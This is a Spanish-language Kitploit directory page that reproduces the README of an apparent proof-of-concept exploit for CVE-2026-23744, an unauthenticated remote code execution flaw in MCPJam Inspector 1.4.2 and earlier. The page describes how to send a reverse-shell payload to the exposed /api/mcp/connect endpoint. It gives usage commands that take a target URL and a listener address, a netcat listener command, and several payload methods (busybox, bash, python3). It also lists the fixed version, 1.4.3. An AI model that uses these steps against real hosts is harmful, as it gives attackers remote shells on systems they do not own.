Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-23744-POC — CVE-2026-23744 — Prueba de concepto de explotación para una vulnerabilidad de ejecución remota de código sin autenticación en MCPJam Inspector <= 1.4.2. | Kitploit
Herramientas/GitHubGitHub/sbouabid-sec/cve-2026-23744-poc
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónHerramienta de Acceso Remoto
GitHubsbouabid-sec/cve-2026-23744-poc

CVE-2026-23744-POC

CVE-2026-23744 — Prueba de concepto de explotación para una vulnerabilidad de ejecución remota de código sin autenticación en MCPJam Inspector <= 1.4.2.

Ver Repositorio
2hace 3 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-23744 — RCE no autenticado en MCPJam Inspector

Python CVE Platform

MCPJam Inspector <= 1.4.2 se vincula a 0.0.0.0 por defecto y expone /api/mcp/connect sin requerir autenticación. El endpoint acepta un objeto serverConfig que lanza un proceso directamente en el host; enviar un payload de reverse shell otorga RCE inmediato sin necesidad de credenciales.


Requisitos

root@kitploit:~
pip install requests

Uso

root@kitploit:~
python3 exploit.py -u <target_url> -i <lhost> -p <lport> [-m <method>]
FlagDescripciónPor defecto
-uURL del objetivoobligatorio
-iIP de tu listener (LHOST)obligatorio
-pPuerto de tu listener (LPORT)obligatorio
-mMétodo de payload: busybox, bash, python3busybox

Ejemplo de reverse shell

Paso 1 — Inicia tu listener:

root@kitploit:~
nc -lvnp 4444

Paso 2 — Ejecuta el exploit:

root@kitploit:~
# bash
python3 POC.py -u http://127.0.0.1:6274 -i 10.10.10.10 -p 4444 -m bash

Métodos de payload

Si busybox no funciona en el objetivo, prueba los otros métodos:

root@kitploit:~
# bash
python3 POC.py -u http://127.0.0.1:6274 -i 10.10.10.10 -p 4444 -m bash

Versiones afectadas

SoftwareVulnerableCorregida
MCPJam Inspector<= 1.4.21.4.3

Referencias

  • CrowdSec CVE Tracker — CVE-2026-23744
  • MCPJam Inspector GitHub
Descargar herramienta